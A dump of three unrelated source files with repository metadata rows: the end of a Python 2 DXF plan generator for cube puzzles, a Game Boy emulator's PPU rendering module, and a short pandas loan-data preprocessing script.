self._setChar(out, x*2, (y*2)+b, str(a)[-1])
else:
assert abs(x2-x) == 1,(x,x2)
if x2<x:
x = x2
for b in range(3):
self._setChar(out, (x*2)+b, y*2, str(a)[-1])
for y in sorted(out):
print out[y]
def drawNumber(self, char, x, y, width, height, layer, reverse = False):
char = int(char)
assert char>=0 and char<=9, char
if char == 1:
return [sdxf.Line(points=[(x+width/2,y),(x+width/2,y+height)], layer=layer)]
ret = []
if char in [0,2,3,5,6,7,8,9]: # top bar
ret.append(sdxf.Line(points=[(x,y),(x+width,y)], layer=layer))
if char in [0,1,4,8,9] or (reverse and char in [2,3,7]) or (not reverse and char in [5,6]): # top-right
ret.append(sdxf.Line(points=[(x+width,y),(x+width,y+height/2)], layer=layer))
if char in [0,1,6,8] or (reverse and char in [3,4,5,7,9]) or (not reverse and char in [2]): # bottom-right
ret.append(sdxf.Line(points=[(x+width,y+height/2),(x+width,y+height)], layer=layer))
if char in [0,2,3,5,6,8,9]: # bottom bar
ret.append(sdxf.Line(points=[(x+width,y+height),(x,y+height)], layer=layer))
if char in [0,4,8,9] or (reverse and char in [5,6]) or (not reverse and char in [2,3,7]): # top-left
ret.append(sdxf.Line(points=[(x,y),(x,y+height/2)], layer=layer))
if char in [0,6,8] or (reverse and char in [2]) or (not reverse and char in [3,4,5,7,9]): # bottom-left
ret.append(sdxf.Line(points=[(x,y+height/2),(x,y+height)], layer=layer))
if char in [2,3,4,5,6,8,9]: # middle bar
ret.append(sdxf.Line(points=[(x,y+height/2),(x+width,y+height/2)], layer=layer))
return ret
def centredText(self, text,x,y,width,height, reverse=False, topspacing=None, bottomspacing = None):
spacing = (self.width-2.0)/24
if spacing < 0.25:
spacing = 0.25
if topspacing == None:
topspacing = spacing
else:
topspacing = spacing/topspacing
if bottomspacing == None:
bottomspacing = spacing
else:
bottomspacing = spacing/bottomspacing
#print "spacing", spacing
itemWidth = (width-((len(text)+1)*spacing))/len(text)
ret = []
if not reverse:
text = tuple(reversed(text))
for i in range(len(text)):
ret.extend(self.drawNumber(text[i], x+(i*(itemWidth+spacing))+spacing,y+topspacing,itemWidth,height-(topspacing+bottomspacing),layer="TEXT_LAYER", reverse = reverse))
return ret
def makeNumbers(self, reverse):
outline = []
# text spacing is 1/4 for the first item, 2/4 for the centre and 1/4 for the last
horizspace = (self.width-2.0)/3 # unit (i.e 1/4) for horizontal spacing. -2 to cope with notches
vertspace = (self.height-2.0)/3
print "width",self.width,horizspace,vertspace
outline.extend(self.centredText("%d"%self.index, 1+horizspace, 1+vertspace, horizspace, vertspace, reverse))
#assert [x for x in self.neighbour if x==None] == [],self.neighbour
#print self.index,[x.index for x in self.neighbour],self.colour, self.direction, reverse
def drawNeighbours(neighs, x,y):
if len(neighs) == 0:
return
space = vertspace/(1.0*len(neighs))
for (i,n) in enumerate(neighs):
if len(neighs)>1:
print "number", n.index, i, x,y+(i*space), space
if i != 0:
topspacing = len(neighs)
else:
topspacing = None
if i!=len(neighs)-1:
bottomspacing = len(neighs)
else:
bottomspacing = None
outline.extend(self.centredText("%d"%n.index, x, y+(i*space), horizspace, space, reverse, bottomspacing=bottomspacing, topspacing =topspacing))
drawNeighbours(self.neighbour[0], 1, 1+vertspace)
drawNeighbours(self.neighbour[1], 1+horizspace, 1)
drawNeighbours(self.neighbour[2], 1+(horizspace*2), 1+vertspace)
drawNeighbours(self.neighbour[3], 1+horizspace, 1+(vertspace*2))
return outline
def makeOutline(self, invert=False):
place = (0,0)
outline = []
# These pieces have their directions on the wrong side, so they need flipping
reverse = self.direction in [Direction.POS_Y, Direction.NEG_Z, Direction.NEG_X]
if invert:
reverse = not reverse
toTest = [place]
tested = []
neighbourSet = {place:self}
while len(toTest)>0:
point = toTest[0]
toTest = toTest[1:]
current = neighbourSet[point]
(x,y) = point
for value in range(len(current.neighbour)):
n = current.neighbour[value]
if len(n) == 0:
continue
for poss in n:
if poss in tested:
continue
if poss.direction!=current.direction:
continue
n = poss
break
else:
continue
print "neighbour", n
if value == 0:
if reverse:
newPoint = (x-self.width+1, y)
else:
newPoint = (x+self.width-1, y)
elif value == 1:
newPoint = (x, y+self.height-1)
elif value == 2:
if reverse:
newPoint = (x+self.width-1, y)
else:
newPoint = (x-self.width+1, y)
elif value == 3:
newPoint = (x, y-self.height+1)
neighbourSet[newPoint] = n
toTest.append(newPoint)
tested.append(current)
for point in neighbourSet:
thisOutline = []
(x,y) = point
current = neighbourSet[point]
pts = current.makeFaceOutline()
thisOutline.append(sdxf.LwPolyLine(points=pts))
thisOutline.extend(current.makeNumbers(reverse))
# rotate all the items 180 degrees so they're the right way up in QCad
for item in thisOutline:
if reverse: # except the reverse ones, which just want flipping
item.points = [(x+a,y-b+self.height) for (a,b) in item.points]
else:
item.points = [(x-a+self.width,y-b+self.height) for (a,b) in item.points]
outline.extend(thisOutline)
found = {}
for item in outline:
if not isinstance(item, sdxf.LwPolyLine):
continue
sequence = [tuple(sorted((item.points[a],item.points[a+1]))) for a in range(len(item.points)-1)]
for pair in sequence:
if pair not in found:
found[pair] = 1
else:
found[pair] +=1
for item in outline:
if not isinstance(item, sdxf.LwPolyLine):
continue
sequence = [(item.points[a],item.points[a+1]) for a in range(len(item.points)-1)]
sequence = [pair for pair in sequence if found[tuple(sorted(pair))]==1]
newpts = [[]]
for a in range(len(sequence)-1):
if sequence[a][1] == sequence[a+1][0]:
newpts[-1].append(sequence[a][0])
else:
newpts[-1].extend(sequence[a])
newpts.append([])
if len(newpts[0])==0:
continue
try:
newpts[-1].extend(sequence[-1])
except IndexError:
for pts in newpts:
print "pts",pts
print "item.points",item.points
print "sequence",sequence
raise
if len(newpts)>1 or newpts[0]!=item.points:
for pts in newpts:
print "pts",pts
print "item.points",item.points
print "sequence",sequence
#raise Exception
item.points = newpts[0]
for pts in newpts[1:]:
outline.append(sdxf.LwPolyLine(points=pts))
smallest = [0,0]
for item in outline:
for (x,y) in item.points:
if x<smallest[0]:
smallest[0] = x
if y<smallest[1]:
smallest[1] = y
offset = [-smallest[a] for a in range(2)]
size = [0,0]
for item in outline:
newpts = [list(p) for p in item.points]
for p in newpts:
p[0] += offset[0]
p[1] += offset[1]
for a in range(2):
size[a] = max(size[a], p[a])
item.points = newpts
print "size", size
return {"faces":neighbourSet.values(), "outline":outline, "size": size}
def makeFaceOutline(self):
#self.printFace()
x,y = 0,0
while not self.grid[x][y]:
#print "initial no good", x,y
x +=1
if x == self.width:
raise Exception, "Sanity failure, doesn't look like a valid piece"
#print "start",x,y,self.grid[x][y]
pts = []
while True:
#print x,y
if (x,y) in pts:
pts.append((x,y))
#print pts
#self.printFace(pts)
assert pts[0] == (x,y), (pts[0],x,y)
return pts
pts.append((x,y))
try:
if y<self.height and x<self.width and self.grid[x][y] and (y==0 or not self.grid[x][y-1]):
x +=1
#print "move right to", x,y
elif y<self.height and ((x>0 and x<self.width and not self.grid[x][y] and self.grid[x-1][y]) or (x == self.width and self.grid[x-1][y])):
y +=1
#print "move down to", x,y,
#if x<self.width-1:
# print self.grid[x][y-1],self.grid[x-1][y-1]
#else:
# print
elif x<self.width and ((y!=0 and self.grid[x][y-1] and not self.grid[x-1][y-1]) or (x == 0 and self.grid[x][y-1])):
y-=1
#print "move up to", x,y
elif x>0 and ((y<self.height and not self.grid[x-1][y]) or y == self.height):
x-=1
#print "move left to", x,y
else:
raise Exception
if x<0 or y<0:
raise Exception,(x,y)
except Exception:
print pts
self.printFace(pts)
raise
def cube_faces(space, topleft, cube_side):
(x,y,z) = topleft
(x2,y2,z2) = bottomright = (x+cube_side, y+cube_side, z+cube_side)
assert x<x2,(x,x2)
assert y<y2,(y,y2)
assert z<z2,(z,z2)
ret = []
ret.append(Face(Direction.POS_Z,x2-x,y2-y,topleft,space))
ret.append(Face(Direction.POS_X,y2-y,z2-z,topleft,space))
ret.append(Face(Direction.POS_Y,x2-x,z2-z,topleft,space))
ret.append(Face(Direction.NEG_Z,x2-x,y2-y,bottomright,space))
ret.append(Face(Direction.NEG_X,y2-y,z2-z,bottomright,space))
ret.append(Face(Direction.NEG_Y,x2-x,z2-z,bottomright,space))
return ret
class CubeType(Enum):
Filled = 1
Empty = 2 # can be seen by an edge cube
HiddenEmpty = 3 # can't been seen by edge
def find_nonhidden_cubes(grid, x,y,z):
ret = []
if x>0 and grid[z][y][x-1] == CubeType.HiddenEmpty:
ret.append((x-1,y,z))
if x<len(grid[z][y])-1 and grid[z][y][x+1] == CubeType.HiddenEmpty:
ret.append((x+1,y,z))
if y>0 and grid[z][y-1] == CubeType.HiddenEmpty:
ret.append((x,y-1,z))
if y<len(grid[z])-1 and grid[z][y+1][x] == CubeType.HiddenEmpty:
ret.append((x,y+1,z))
if z>0 and grid[z-1][y][x] == CubeType.HiddenEmpty:
ret.append((x,y,z-1))
if z<len(grid)-1 and grid[z+1][y][x] == CubeType.HiddenEmpty:
ret.append((x,y,z+1))
return ret
def find_empty_cubes(cube_grid):
tocheck = []
ret = []
for z in range(len(cube_grid)):
plane = []
for y in range(len(cube_grid[z])):
row = []
for x in range(len(cube_grid[z][y])):
if cube_grid[z][y][x]:
row.append(CubeType.Filled)
elif x == 0 or x == len(cube_grid[z][y])-1 or y == 0 or y == len(cube_grid[z])-1 or z == 0 or z == len(cube_grid)-1:
row.append(CubeType.Empty)
tocheck.append((x,y,z))
else:
row.append(CubeType.HiddenEmpty)
plane.append(row)
ret.append(plane)
while len(tocheck)>0:
(x,y,z) = tocheck[0]
tocheck = tocheck[1:]
newempty = find_nonhidden_cubes(ret, x,y,z)
tocheck.extend(newempty)
for (x,y,z) in newempty:
ret[z][y][x] = CubeType.Empty
return ret
class Plans(sdxf.Drawing):
def setup(self):
sdxf.Drawing.__init__(self)
self.used = [[False for y in range(self.sheet_size[1])] for x in range(self.sheet_size[0])]
for layer in self.layers:
if layer.name == "TEXT_LAYER":
break
else:
self.layers.append(sdxf.Layer(name="TEXT_LAYER", color=DXFColours.Blue.value()))
def __init__(self, sheet_size, file_pattern):
self.sheet_size = sheet_size
self.file_pattern = file_pattern
self.sheet_index = 0
self.setup()
def place(self, items, size):
x,y = 0,0
while True:
if y + size[1] > self.sheet_size[1]: # Design can't fit on one sheet
self.saveas(self.file_pattern%self.sheet_index)
self.sheet_index +=1
self.setup()
x,y = 0,0
for x2 in range(x, min(self.sheet_size[0],x+size[0]+1)):
for y2 in range(y, min(self.sheet_size[1],y+size[1]+1)):
if self.used[x2][y2]:
x = x2+1
if self.sheet_size[0] < x+size[0]:
x = 0
y +=1
break
else:
continue # if no break in inner loop, can continue
break
else:
print "occupied", x,y, size
# found a space
for x2 in range(x, min(self.sheet_size[0],x+size[0]+1)):
for y2 in range(y, min(self.sheet_size[1],y+size[1]+1)):
self.used[x2][y2] = True
for item in items:
newpts = [list(p) for p in item.points]
for p in newpts:
p[0] += x
p[1] += y
item.points = newpts
self.extend(items)
break
def finished(self):
self.saveas(self.file_pattern%self.sheet_index)
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("-c","--cube-side",default=6,type="int",dest="cube_side",help="Number of unit lengths per cube side")
def size_callback(option, opt_str, value, parser):
items = value.split(",")
if len(items)!=2:
raise OptionValueError, "%s is an invalid sheet size"%value
try:
value = [int(x) for x in items]
except ValueError:
raise OptionValueError, "%s is an invalid sheet size"%value
setattr(parser.values, option.dest, value)
parser.add_option("-s","--sheet-size", default=(100,200),action="callback", callback=size_callback, nargs=1, dest="sheet_size",type="string")
parser.add_option("-r","--random-seed",default=None, dest="seed")
parser.add_option("-i","--invert-pieces",action="store_true",default=False,dest="invert",help="Generate pieces with instructions on the outside")
(opts,args) = parser.parse_args()
if opts.cube_side < 4:
parser.error("Cube sides must be at least 4")
if len(args)!=1:
parser.error("Need a specification file")
try:
data = file(args[0])
except IOError:
parser.error("Can't open '%s'"%args[0])
cube_grid = []
plane = []
for line in data.readlines():
line = line.strip()
if len(line)==0:
cube_grid.append(plane)
plane = []
else:
if [x for x in line if x not in ('*', '-')]!=[]:
parser.error("'%s' is an invalid row!"%line)
row = [x == '*' for x in line]
plane.append(row)
if plane!=[]:
cube_grid.append(plane)
random.seed(opts.seed)
if opts.sheet_size[0]<opts.cube_side:
parser.error("Sheet is less wide than the cube size!")
if opts.sheet_size[1]<opts.cube_side:
parser.error("Sheet is less long than the cube size!")
dimensions = [None,None,len(cube_grid)]
for plane in cube_grid:
if dimensions[1] == None:
dimensions[1] = len(plane)
else:
assert dimensions[1] == len(plane)
for row in plane:
if dimensions[0] == None:
dimensions[0] = len(row)
else:
assert dimensions[0] == len(row)
space = Space([a*opts.cube_side for a in dimensions], dimensions)
faces = []
grid = find_empty_cubes(cube_grid)
print grid
for z in range(len(cube_grid)):
for y in range(len(cube_grid[z])):
for x in range(len(cube_grid[z][y])):
if cube_grid[z][y][x]:
newfaces = cube_faces(space, (x*(opts.cube_side-1),y*(opts.cube_side-1),z*(opts.cube_side-1)), opts.cube_side)
for face in newfaces:
print face, face.index, face.direction
if face.direction == Direction.NEG_X and (x == len(cube_grid[z][y])-1 or grid[z][y][x+1] == CubeType.Empty):
faces.append(face)
elif face.direction == Direction.NEG_Y and (y == len(cube_grid[z])-1 or grid[z][y+1][x] == CubeType.Empty):
faces.append(face)
elif face.direction == Direction.NEG_Z and (z == len(cube_grid)-1 or grid[z+1][y][x] == CubeType.Empty):
faces.append(face)
elif face.direction == Direction.POS_X and (x == 0 or grid[z][y][x-1] == CubeType.Empty):
faces.append(face)
elif face.direction == Direction.POS_Y and (y == 0 or grid[z][y-1][x] == CubeType.Empty):
faces.append(face)
elif face.direction == Direction.POS_Z and (z == 0 or grid[z-1][y][x] == CubeType.Empty):
faces.append(face)
else:
print "skipping", face, face.direction
face.removeCubes()
blender = sdxf.Drawing()
space.fixCubes(opts.cube_side)
space.generateCubes(blender)
blender.saveas(args[0]+'-3d.dxf')
# reindex all of the faces as there's a few missing after the hidden-face removal
for newindex,face in enumerate(sorted(faces, key=operator.attrgetter("index"))):
face.index = newindex
plans = Plans(opts.sheet_size, args[0]+'-plans-%d.dxf')
facesDone = []
for face in sorted(faces, key=operator.attrgetter("index")):
#print face, face.colour
if face in facesDone:
continue
data = face.makeOutline(opts.invert)
plans.place(data["outline"], data["size"])
facesDone.extend(data["faces"])
plans.finished()
| [
"[email protected]"
] | |
358012077eb4c068106c8c7644d79efd8d5017d8 | 54d6109c8fc0aa4167eeee513163f05fc0d68775 | /vsgb/ppu.py | f810b1c269fca9778f74a01dc1c064ea0517446a | [] | no_license | AdrianoAzuos/vsgb | 2421dccb95c84250e782102ca0b0b1e05a653f5a | f9dc9a13c4dc91d42127a9f2aeaaee6cb152a9a2 | refs/heads/master | 2020-08-15T22:37:27.760549 | 2019-10-15T14:17:34 | 2019-10-15T14:17:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,428 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Documentation source:
# - https://gbdev.gg8.se/wiki/articles/Video_Display
from vsgb.byte_operations import signed_value
from vsgb.interrupt_manager import Interrupt, InterruptManager
from vsgb.io_registers import IO_Registers
from vsgb.mmu import MMU
from vsgb.window import Window
class PPU:
FRAMEBUFFER_SIZE = Window.SCREEN_WIDTH * Window.SCREEN_HEIGHT
H_BLANK_STATE = 0
V_BLANK_STATE = 1
OAM_READ_STATE = 2
VMRAM_READ_STATE = 3
OAM_SCANLINE_TIME = 80
VRAM_SCANLINE_TIME = 172
H_BLANK_TIME = 204
V_BLANK_TIME = 4560
def __init__(self, mmu : MMU, interruptManager : InterruptManager):
self.mmu = mmu
self.interruptManager = interruptManager
self.lcdControlRegister = LCDControlRegister(self.mmu)
self.framebuffer = [0xffffffff]*PPU.FRAMEBUFFER_SIZE
self.mode = PPU.V_BLANK_STATE
self.modeclock = 0
self.vblank_line = 0
self.auxillary_modeclock = 0
self.screen_enabled = True
self.window_line = 0
def step(self, cycles : int = 1):
self.vblank = False
self.modeclock += cycles
self.auxillary_modeclock += cycles
if self.lcdControlRegister.lcd_display_enable():
if self.screen_enabled:
if self.mode == PPU.H_BLANK_STATE:
if self.modeclock >= PPU.H_BLANK_TIME:
self.exec_hblank()
elif self.mode == PPU.V_BLANK_STATE:
self.exec_vblank()
elif self.mode == PPU.OAM_READ_STATE:
if self.modeclock >= PPU.OAM_SCANLINE_TIME:
self.exec_oam()
elif self.mode == PPU.VMRAM_READ_STATE:
if self.modeclock >= PPU.VRAM_SCANLINE_TIME:
self.exec_vram()
else:
self.screen_enabled = True
self.modeclock = 0
self.mode = 0
self.auxillary_modeclock = 0
self.window_line = 0
self.reset_current_line()
self.update_stat_mode()
self.compare_lylc()
else:
self.screen_enabled = False
def exec_vram(self):
self.modeclock -= PPU.VRAM_SCANLINE_TIME
self.mode = PPU.H_BLANK_STATE
self.scanline()
self.update_stat_mode()
def exec_oam(self):
self.modeclock -= PPU.OAM_SCANLINE_TIME
self.mode = PPU.VMRAM_READ_STATE
self.update_stat_mode()
def exec_hblank(self):
self.modeclock -= PPU.H_BLANK_TIME
self.mode = PPU.OAM_READ_STATE
self.next_line()
self.compare_lylc()
if self.current_line() == 144:
self.mode = PPU.V_BLANK_STATE
self.auxillary_modeclock = self.modeclock
self.vblank = True
self.window_line = 0
self.interruptManager.request_interrupt(Interrupt.INTERRUPT_VBLANK)
self.update_stat_mode()
def exec_vblank(self):
if self.auxillary_modeclock >= 456:
self.auxillary_modeclock -= 456
self.vblank_line += 1
if self.vblank_line <= 9:
self.next_line()
self.compare_lylc()
if self.modeclock >= PPU.V_BLANK_TIME:
self.modeclock -= PPU.V_BLANK_TIME
self.mode = PPU.OAM_READ_STATE
self.update_stat_mode()
self.reset_current_line()
self.vblank_line = 0
def scanline(self):
line = self.current_line()
if line <= 144:
self.render_background(line)
self.render_window(line)
self.render_sprite(line)
def update_stat_mode(self):
# LCD Status Register
# FF41 - STAT - LCDC Status (R/W)
# -------------------------------
# Bit 6 - LYC=LY Coincidence Interrupt (1=Enable) (Read/Write)
# Bit 5 - Mode 2 OAM Interrupt (1=Enable) (Read/Write)
# Bit 4 - Mode 1 V-Blank Interrupt (1=Enable) (Read/Write)
# Bit 3 - Mode 0 H-Blank Interrupt (1=Enable) (Read/Write)
# Bit 2 - Coincidence Flag (0:LYC<>LY, 1:LYC=LY) (Read Only)
# Bit 1-0 - Mode Flag (Mode 0-3, see below) (Read Only)
# 0: During H-Blank
# 1: During V-Blank
# 2: During Searching OAM
# 3: During Transferring Data to LCD Driver
# The two lower STAT bits show the current status of the LCD controller.
# The LCD controller operates on a 222 Hz = 4.194 MHz dot clock. An entire frame is 154 scanlines, 70224 dots, or 16.74 ms. On scanlines 0 through 143, the LCD controller cycles through modes 2, 3, and 0 once every 456 dots. Scanlines 144 through 153 are mode 1.
# The following are typical when the display is enabled:
# Mode 2 2_____2_____2_____2_____2_____2___________________2____
# Mode 3 _33____33____33____33____33____33__________________3___
# Mode 0 ___000___000___000___000___000___000________________000
# Mode 1 ____________________________________11111111111111_____
stat = self.mmu.read_byte(IO_Registers.STAT)
new_stat = (stat & 0xfc) | (self.mode & 0x3)
self.mmu.write_byte(IO_Registers.STAT, new_stat)
def current_line(self):
return self.mmu.read_byte(IO_Registers.LY)
def reset_current_line(self):
self.mmu.write_byte(IO_Registers.LY, 0)
def next_line(self):
self.mmu.write_byte(IO_Registers.LY, self.current_line() + 1)
def rgb(self, color_code : int) -> int:
return {
0: 0xf0f0f0ff,
1: 0xc0d8a8ff,
2: 0x0090a8ff,
3: 0x000000ff
}.get(color_code)
def rgb_sprite(self, color_code : int) -> int:
return {
0: 0xf0f0f0ff,
1: 0xe8a0a0ff,
2: 0x806050ff,
3: 0x000000ff
}.get(color_code)
def compare_lylc(self):
if self.lcdControlRegister.lcd_display_enable():
lyc = self.mmu.read_byte(IO_Registers.LYC)
stat = self.mmu.read_byte(IO_Registers.STAT)
if lyc == self.current_line():
stat = stat | 0x4
else:
stat = stat & 0xfb
self.mmu.write_byte(IO_Registers.STAT, stat)
def render_background(self, line : int):
line_width = (Window.SCREEN_HEIGHT - line -1) * Window.SCREEN_WIDTH
if self.lcdControlRegister.bg_window_display_priority():
# tile and map select
tiles_select = self.lcdControlRegister.bg_and_window_tile_data_select()
map_select = self.lcdControlRegister.bg_tile_map_display_select()
# x pixel offset
scx = self.mmu.read_byte(IO_Registers.SCX)
# y pixel offset
scy = self.mmu.read_byte(IO_Registers.SCY)
# line with y offset
line_adjusted = (line + scy) & 0xff
# get position of tile row to read
y_offset = int(line_adjusted / 8) * 32
# relative line number in tile
tile_line = line_adjusted % 8
# relative line number offset
tile_line_offset = tile_line * 2
palette = self.mmu.read_byte(IO_Registers.BGP)
x = 0
while x < 32:
tile = 0
if tiles_select == 0x8800:
tile = signed_value(self.mmu.read_byte(map_select + y_offset + x))
tile += 128
else:
tile = self.mmu.read_byte(map_select + y_offset + x)
line_pixel_offset = x * 8
tile_select_offset = tile * 16
tile_address = tiles_select + tile_select_offset + tile_line_offset
byte_1 = self.mmu.read_byte(tile_address)
byte_2 = self.mmu.read_byte(tile_address + 1)
pixelx = 0
buffer_addr = (line_pixel_offset - scx)
while pixelx < 8:
buffer_addr = buffer_addr & 0xff
shift = 0x1 << (7 - pixelx)
pixel = 1 if (byte_1 & shift > 0) else 0
pixel |= 2 if (byte_2 & shift > 0) else 0
color = (palette >> (pixel * 2)) & 0x3
pixelx += 1
if 0 <= buffer_addr < Window.SCREEN_WIDTH:
position = line_width + buffer_addr
self.framebuffer[position] = self.rgb(color)
buffer_addr = ( line_pixel_offset + pixelx - scx )
x += 1
else:
for i in range(0, Window.SCREEN_WIDTH):
self.framebuffer[line_width + i] = self.rgb(0)
def render_window(self, line : int):
line_width = (Window.SCREEN_HEIGHT - line -1) * Window.SCREEN_WIDTH
# dont render if the window is outside the bounds of the screen or
# if the LCDC window enable bit flag is not set
if self.window_line > 143 or not self.lcdControlRegister.window_display_enable():
return
window_pos_x = self.mmu.read_byte(IO_Registers.WX) - 7
window_pos_y = self.mmu.read_byte(IO_Registers.WY)
# don't render if the window is outside the bounds of the screen
if window_pos_x > 159 or window_pos_y > 143 or window_pos_y > line:
return
tiles_select = self.lcdControlRegister.bg_and_window_tile_data_select()
map_select = self.lcdControlRegister.window_tile_map_display_select()
line_adjusted = self.window_line
y_offset = int(line_adjusted / 8) * 32
tile_line = line_adjusted % 8
tile_line_offset = tile_line * 2
for x in range(0,32):
tile = 0
if tiles_select == 0x8800:
tile = signed_value(self.mmu.read_byte(map_select + y_offset + x))
tile += 128
else:
tile = self.mmu.read_byte(map_select + y_offset + x)
line_pixel_offset = x * 8
tile_select_offset = tile * 16
tile_address = tiles_select + tile_select_offset + tile_line_offset
byte_1 = self.mmu.read_byte(tile_address)
byte_2 = self.mmu.read_byte(tile_address + 1)
palette = self.mmu.read_byte(IO_Registers.BGP)
for pixelx in range(0,8):
buffer_addr = line_pixel_offset + pixelx + window_pos_x
if buffer_addr < 0 or buffer_addr >= Window.SCREEN_WIDTH:
continue
shift = 0x1 << (7 - pixelx)
pixel = 0
if (byte_1 & shift == shift) and (byte_2 & shift == shift):
pixel = 3
elif (byte_1 & shift == 0x0) and (byte_2 & shift == shift):
pixel = 2
elif (byte_1 & shift == shift) and (byte_2 & shift == 0x0):
pixel = 1
elif (byte_1 & shift == 0x0) and (byte_2 & shift == 0x00):
pixel = 0
position = line_width + buffer_addr
color = (palette >> (pixel * 2)) & 0x3
self.framebuffer[position] = self.rgb(color)
self.window_line += 1
def render_sprite(self, line : int):
line_width = (Window.SCREEN_HEIGHT - line -1) * Window.SCREEN_WIDTH
if not self.lcdControlRegister.sprite_display_enable():
return
sprite_size = self.lcdControlRegister.sprite_size()
for sprite in range(39,-1,-1):
sprite_offset = sprite * 4
sprite_y = self.mmu.read_byte(0xfe00 + sprite_offset) - 16
if sprite_y > line or (sprite_y + sprite_size) <= line:
continue
sprite_x = self.mmu.read_byte(0xfe00 + sprite_offset + 1) - 8
if sprite_x < -7 or sprite_x >= Window.SCREEN_WIDTH:
continue
sprite_tile_offset = (self.mmu.read_byte(0xfe00 + sprite_offset + 2) & (0xfe if sprite_size == 16 else 0xff)) * 16
# Attributes/Flags:
# Bit7 OBJ-to-BG Priority (0=OBJ Above BG, 1=OBJ Behind BG color 1-3)
# (Used for both BG and Window. BG color 0 is always behind OBJ)
# Bit6 Y flip (0=Normal, 1=Vertically mirrored)
# Bit5 X flip (0=Normal, 1=Horizontally mirrored)
# Bit4 Palette number **Non CGB Mode Only** (0=OBP0, 1=OBP1)
# Bit3 Tile VRAM-Bank **CGB Mode Only** (0=Bank 0, 1=Bank 1)
# Bit2-0 Palette number **CGB Mode Only** (OBP0-7)
sprite_flags = self.mmu.read_byte(0xfe00 + sprite_offset + 3)
priority = sprite_flags & 0x80 != 0x80
x_flip = sprite_flags & 0x20 == 0x20
y_flip = sprite_flags & 0x40 == 0x40
palette = sprite_flags & 0b00010000
tiles = 0x8000
pixel_y = (15 if sprite_size == 16 else 7) - (line - sprite_y) if y_flip else line - sprite_y
pixel_y_2 = 0
offset = 0
if sprite_size == 16 and (pixel_y >= 8):
pixel_y_2 = (pixel_y - 8) * 2
offset = 16
else:
pixel_y_2 = pixel_y * 2
tile_address = tiles + sprite_tile_offset + pixel_y_2 + offset
byte_1 = self.mmu.read_byte(tile_address)
byte_2 = self.mmu.read_byte(tile_address + 1)
obp0 = self.mmu.read_byte(IO_Registers.OBP0)
obp1 = self.mmu.read_byte(IO_Registers.OBP1)
if palette == 0:
palette = obp0
else:
palette = obp1
for pixelx in range(0,8):
shift = 0x1 << (pixelx if x_flip else 7 - pixelx)
pixel = 0
if (byte_1 & shift == shift) and (byte_2 & shift == shift):
pixel = 3
elif (byte_1 & shift == 0x0) and (byte_2 & shift == shift):
pixel = 2
elif (byte_1 & shift == shift) and (byte_2 & shift == 0x0):
pixel = 1
elif (byte_1 & shift == 0x0) and (byte_2 & shift == 0x00):
continue
buffer_x = sprite_x + pixelx
if buffer_x < 0 or buffer_x >= Window.SCREEN_WIDTH:
continue
position = line_width + buffer_x
color = (palette >> (pixel * 2)) & 0x3
if priority or self.framebuffer[position] == self.rgb(0):
self.framebuffer[position] = self.rgb_sprite(color)
class LCDControlRegister:
# LCD Control Register
# Bit 7 - LCD Display Enable (0=Off, 1=On)
# Bit 6 - Window Tile Map Display Select (0=9800-9BFF, 1=9C00-9FFF)
# Bit 5 - Window Display Enable (0=Off, 1=On)
# Bit 4 - BG & Window Tile Data Select (0=8800-97FF, 1=8000-8FFF)
# Bit 3 - BG Tile Map Display Select (0=9800-9BFF, 1=9C00-9FFF)
# Bit 2 - OBJ (Sprite) Size (0=8x8, 1=8x16)
# Bit 1 - OBJ (Sprite) Display Enable (0=Off, 1=On)
# Bit 0 - BG/Window Display/Priority (0=Off, 1=On)
def __init__(self, mmu : MMU):
self.mmu = mmu
def lcdc_status(self) -> int:
return self.mmu.read_byte(IO_Registers.LCDC)
def lcd_display_enable(self) -> bool:
return self.lcdc_status() & 0b10000000 == 0b10000000
def window_tile_map_display_select(self) -> int:
return 0x9c00 if self.lcdc_status() & 0b01000000 == 0b01000000 else 0x9800
def window_display_enable(self) -> bool:
return self.lcdc_status() & 0b00100000 == 0b00100000
def bg_and_window_tile_data_select(self) -> int:
return 0x8000 if self.lcdc_status() & 0b00010000 == 0b00010000 else 0x8800
def bg_tile_map_display_select(self) -> int:
return 0x9c00 if self.lcdc_status() & 0b00001000 == 0b00001000 else 0x9800
def sprite_size(self) -> int:
return 16 if self.lcdc_status() & 0b00000100 == 0b00000100 else 8
def sprite_display_enable(self) -> bool:
return self.lcdc_status() & 0b00000010 == 0b00000010
def bg_window_display_priority(self) -> bool:
return self.lcdc_status() & 0b00000001 == 0b00000001
| [
"[email protected]"
] | |
4aa34266c685f2f11224712c0c307105ac9c88c8 | 9a4394a6f6f186722121de02852f05d201c85ddb | /test.py | 484c8172ca949c84ec1c2c03e778c1fe035b02e5 | [] | no_license | narendramishra91/Loan-Prediction | e2aa231bad534578dbe5c5306b0da2e28894f031 | 8cdb680470a3ca3ab266f026e9ed7399f14928bf | refs/heads/master | 2023-01-11T12:21:02.749773 | 2020-11-16T19:46:28 | 2020-11-16T19:46:28 | 282,413,289 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,014 | py | import pandas as pd
def dataFunction():
data = pd.read_csv("loan_dataset.csv")
data.dropna(subset=['Credit_History','Married', 'Gender', 'LoanAmount', 'Dependents' ], axis=0, inplace = True)
data['Loan_Amount_Term'].fillna(360, inplace = True)
data['Self_Employed'].fillna('No', inplace = True)
data['Married'].replace({'Yes':1, 'No':0}, inplace = True)
data['Education'].replace({'Graduate':1, 'Not Graduate':0}, inplace = True)
data['Gender'].replace({'Male':1, 'Female':0}, inplace = True)
data['Self_Employed'].replace({'Yes':1, 'No':0}, inplace = True)
data['Loan_Status'].replace({'Y':1, 'N':0}, inplace = True)
data['Property_Area'].replace({'Rural':1, 'Urban':2, 'Semiurban':3}, inplace = True)
data['Dependents'].replace({'3+':3}, inplace = True)
data.drop(['Loan_ID'], axis = 1, inplace = True)
return data
def Accuracy(_matrix):
accu = (_matrix[0][0]+ _matrix[1][1])/(_matrix[0][0]+ _matrix[1][1] + _matrix[1][0]+ _matrix[0][1])
return accu
| [
"[email protected]"
] | |
